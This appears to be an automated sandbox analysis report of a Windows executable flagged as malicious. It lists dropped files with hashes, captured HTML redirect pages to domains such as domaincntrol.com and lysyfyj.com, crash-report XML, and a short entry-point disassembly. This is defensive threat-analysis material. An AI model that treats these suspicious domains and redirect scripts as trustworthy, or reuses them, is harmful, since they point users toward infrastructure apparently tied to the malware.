                                                                                                                                                                                                            SHA-512:3AED7F59B9E992121BA8CEEE6D2A2560FE2679FBCAC7680736614305940257E9E53548582BAFEC29682179B8629561D4E84A562FE666533308A1FFED90952DE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:18 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):71420
                                                                                                                                                                                                            Entropy (8bit):1.8708744289149803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CXBP95zKXHXtpgF+5uUOK8mifpvJ7rycQ676ZyCzgh5a4YvAyHyuo87:ABF5zkpgF+5yzmOvJ7ry/ynaVto0
                                                                                                                                                                                                            MD5:6A04D47198CF131BB590BE8AB2B90E4D
                                                                                                                                                                                                            SHA1:BCF94BB926F1667A86FAF133891B0260A17624E9
                                                                                                                                                                                                            SHA-256:71E356C61C875FB08B954DF47DC969843C29A754B1F5E4ACCD916244FFF426AC
                                                                                                                                                                                                            SHA-512:28B5C34CB013DE5323C3CB0D3F7E68184896B1D3B914EDC6819E577AD2A184DA3168DE4A4D4C4BA54553C4107F52798E1D8FF931C3EBEA049DC24CC6788DFCBC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:18 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):97822
                                                                                                                                                                                                            Entropy (8bit):1.838379220490653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ZcXapZo9TzT7fVs3bIV1j2YA0YCUv1qowIVhl:hoZzT7feIMAYXj9h
                                                                                                                                                                                                            MD5:58F5AD9F1640E9F11AC5147E1059D84F
                                                                                                                                                                                                            SHA1:023008FEF53A745F84AEC9AA7765C5C429ED7B24
                                                                                                                                                                                                            SHA-256:65109DA2C051D9A6589D16E1CE009548CFB2CDD6CD70ABDDA14227212C5576F7
                                                                                                                                                                                                            SHA-512:5FD64064B2CD5B0826E1039C6D59D13B77285ED8E4D06E3B6ED127F5C776C1D5A548A9E46938494F28A9C771BB7892CB778A1EA34CE61F8FF74A6D9EF5E082DB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.702602515134831
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ49686Y9vSUONgmfKBprs89bEaFWsfpsm:R6lXJq686YFSUONgmfKVEaf3
                                                                                                                                                                                                            MD5:701C1B46086C1365FB9B7BE03F28161E
                                                                                                                                                                                                            SHA1:3301CB2EF07EA45A7FCBC8881F0ED7F306FF60AA
                                                                                                                                                                                                            SHA-256:E2837BCDCD05FE92D3A1E3634B2AA1DF701D0A84E7CCB7044AFCDB6EC48CA4EA
                                                                                                                                                                                                            SHA-512:2D69E2DF069DF9CB64086CBE6DBE73CD8927C96B33783CD60FB5408CB8B4E7DAC28EE4799D8B77A824EA15DF5D6314D8CB8319EEA6730C3D30176D8660FB45E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6976</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.501667064394497
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsKJg77aI9BeWpW8VY3Ym8M4JUqFT+q8KtBz9/fd:uIjfYI7Df7VrJB99lfd
                                                                                                                                                                                                            MD5:E754086D9978C14CF289E87E41D6CF53
                                                                                                                                                                                                            SHA1:61A2BE21E713554AF95AA2A321E61F02ADF684D7
                                                                                                                                                                                                            SHA-256:1E6FCC2186272762C3BF9CC8BA06F7CA7CB5EFA5215BDAEB5FF19799B51D3FEA
                                                                                                                                                                                                            SHA-512:9854166756AAAD6FCFF615F4D83985EBCCDFD1F0BF5F0B0910E5850F7F362BDC3D4765260A334E2201B6B0A5B64446D8C4B11A2549549C6D45F1ED1756ADEC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490922" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.7014070710191356
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJak6vNJ/C6Y9uSUONgmfKBprx89bEqsf0omsm:R6lXJR6W6Y0SUONgmfKSEJfY
                                                                                                                                                                                                            MD5:FCDC803303E5C1A9BB342DFC4646E0F8
                                                                                                                                                                                                            SHA1:8066ED2BD2D5B04CDCAAA6720766F7AD5000DE62
                                                                                                                                                                                                            SHA-256:DEB1FA094DE236E4FDE0EBE444D70837C485C598DC3AEB84DFFB22F4992E941A
                                                                                                                                                                                                            SHA-512:3C5E188063E6D00D7C199A04B926DF373EC6F1AB23B3EFA53C6D051445C56FBA1E15EC0C82868056E7B793949E78D4D98F23BB3D90C00A1DCB20C3D9B2571626
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.2.8.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.49732569373984
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsKJg77aI9BeWpW8VYlYm8M4JUqFh+q8K6Bz9/ed:uIjfYI7Df7VVJfq9led
                                                                                                                                                                                                            MD5:5E660CDA438AFEB3058A9486DE73BDE4
                                                                                                                                                                                                            SHA1:3FD860A9DE74FF2749FB1DADA9C628072616612C
                                                                                                                                                                                                            SHA-256:754DB16BD05605A067B88691111F9E27FBBFAB02BC1917DC1858E13EDECAD238
                                                                                                                                                                                                            SHA-512:E40065ED8A180C3B1EA0D6E43C39B3355979A0B4B34D6830BEBE22D848E1BB9FAD58FFFA82C08F7DB92BB3F74F42BE4E3EADCCCC60502CB94F435F2421A79D31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490922" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11
                                                                                                                                                                                                            Entropy (8bit):3.0957952550009344
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:0MXAG3n:0MQa
                                                                                                                                                                                                            MD5:32682312D17C7CBF18E73594F5570319
                                                                                                                                                                                                            SHA1:60E22121BDD0BC71CDB2BAE2A3AA577006B2EAE9
                                                                                                                                                                                                            SHA-256:E55FB1A1D731153E943B68844AF12DCCE8BFAC917C98FFDEA64C80DA0607DD47
                                                                                                                                                                                                            SHA-512:68337DEBB9CD659CECE621AF582AE2BC4B56B9CF06B26C45F4D9EB8BEB91D3F36BEAD287218B5AA2BB4853A1CF1A12017CA57318D7E12F489884FDC6B261DFC1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Redirecting
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                            Entropy (8bit):4.43530643106624
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                            MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                            SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                            SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                            SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):481
                                                                                                                                                                                                            Entropy (8bit):5.791950481930078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:kxvsCk9cE3MxlVT/X2irJIQ6V6gRl5nKnYI:kbxxlVT/GHogR2YI
                                                                                                                                                                                                            MD5:CAB79F65957EB7B5F39C4A297DD09B6E
                                                                                                                                                                                                            SHA1:570526FE1CCB4B08D296771C81EF7ACAA059F8FA
                                                                                                                                                                                                            SHA-256:460AEA92C0FE496F9BF6243BD67227BB8644F3FDC5DA3DF834A6DFA73DCE5A82
                                                                                                                                                                                                            SHA-512:E83C5AC78FCED8F3FF1B026C0C1935B56E9D93D2D88A3FEB74328917D8CFFA1DB3FFC367545D4D1BB55B8723F9D09EFABEC51203C78142B5E1D67341DA083AF1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                            Entropy (8bit):4.43530643106624
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                            MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                            SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                            SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                            SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):216064
                                                                                                                                                                                                            Entropy (8bit):7.812400781396835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:lmKVGe1XIpQiU/ma3MB8hH2Tkp6bYnWcZVol0N5TzQ3:971YpQiU/RcO1VQInVob
                                                                                                                                                                                                            MD5:9A96CBEB34AD570586652BD7772616D6
                                                                                                                                                                                                            SHA1:536058D8CF9682014FC449DEF46FADD24B38B160
                                                                                                                                                                                                            SHA-256:5F95753D6C0E92FE324B77AA44416451125B09ED3127674E1825DA59ED384E31
                                                                                                                                                                                                            SHA-512:B257BA41E71BF5D8718352746B2E16AFCCE3CA96BE8E29EC893EF623EBB897CFA48D0790BF7345F0FDE0371191177779A0605BF8FE03E836CA571882AD56EA0D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`B........................K...&........ ....@....................................-............................................................................`e...............................................................................text....-.......................... ..`.lm..........@.......2..............@....qaQL................6..............@....yP.....+............>..............@..@.bPUeWG..R...........L..............@..@.PaB.................T..............@....data...%8... ...:...X..............@....dOh.........`......................@....HvNW...$...........................@..@.pPJb....x...0......................@..@.bBut....=..........................@....rsrc...............................@..@.reloc...............H..............@..B........................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8124014759481
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:5AFlyarMds.exe
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5:fcf6de7351633752cf96e861d60b2a8c
                                                                                                                                                                                                            SHA1:548662dfac5acd8306b09d0af1385b6615b423da
                                                                                                                                                                                                            SHA256:def2f0b62f4af989da3cd943e3120ed81c9fb24979925faac774cca11eb2ea54
                                                                                                                                                                                                            SHA512:0365c358f470843623ab0d425adc53e27027a82e02f800629c54f2913d285f827c85bb35f103743b2a4664cb24fe92f0f1f152bea1eedd341cb9f5c6011325b0
                                                                                                                                                                                                            SSDEEP:6144:+mKVGe1XIpQiU/ma3MB8hH2Tkp6bYnWcZVol0N5TzQ3:w71YpQiU/RcO1VQInVob
                                                                                                                                                                                                            TLSH:362413226D5D4E63C6A714BB1BF6FF552326E5A8432BC7676C00420F0C756C97F3AAA0
                                                                                                                                                                                                            Icon Hash:000ad5f5359575b5
                                                                                                                                                                                                            Entrypoint:0x401c26
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x426083DE [Sat Apr 16 03:17:50 2005 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:088303a3216315a2ba8d66c94c7b80a0
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 0000720Ah
                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            xor edx, edx
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call dword ptr [0040F0B0h]
                                                                                                                                                                                                            mov dword ptr [0042257Ah], eax
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            lea eax, dword ptr [ebx+00422446h]
                                                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                                                            add ecx, dword ptr [0042206Eh]
                                                                                                                                                                                                            shl ecx, 04h
                                                                                                                                                                                                            add ecx, dword ptr [004229DCh]
                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                            sub ecx, 00000F4Bh
                                                                                                                                                                                                            sub ecx, ebx
                                                                                                                                                                                                            add ecx, dword ptr [00422565h]
                                                                                                                                                                                                            shr ecx, 04h
                                                                                                                                                                                                            add dword ptr [00422635h], ecx
                                                                                                                                                                                                            call 00007EFC890679DBh
                                                                                                                                                                                                            mov dword ptr [00422C61h], eax
                                                                                                                                                                                                            mov ebp, 00000000h
                                                                                                                                                                                                            mov ecx, ebp
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            push 000B1DB0h
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            mov eax, 0035D258h
                                                                                                                                                                                                            add ebx, eax
                                                                                                                                                                                                            mov ebx, dword ptr [ebx]
                                                                                                                                                                                                            call ebx
                                                                                                                                                                                                            mov esi, 0000D9A1h
                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                            mov dword ptr [00422FD4h], 0041548Ah
                                                                                                                                                                                                            add eax, dword ptr [00422FD4h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov eax, 00000022h
                                                                                                                                                                                                            mov edx, eax
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            push 00000013h
                                                                                                                                                                                                            pop ecx
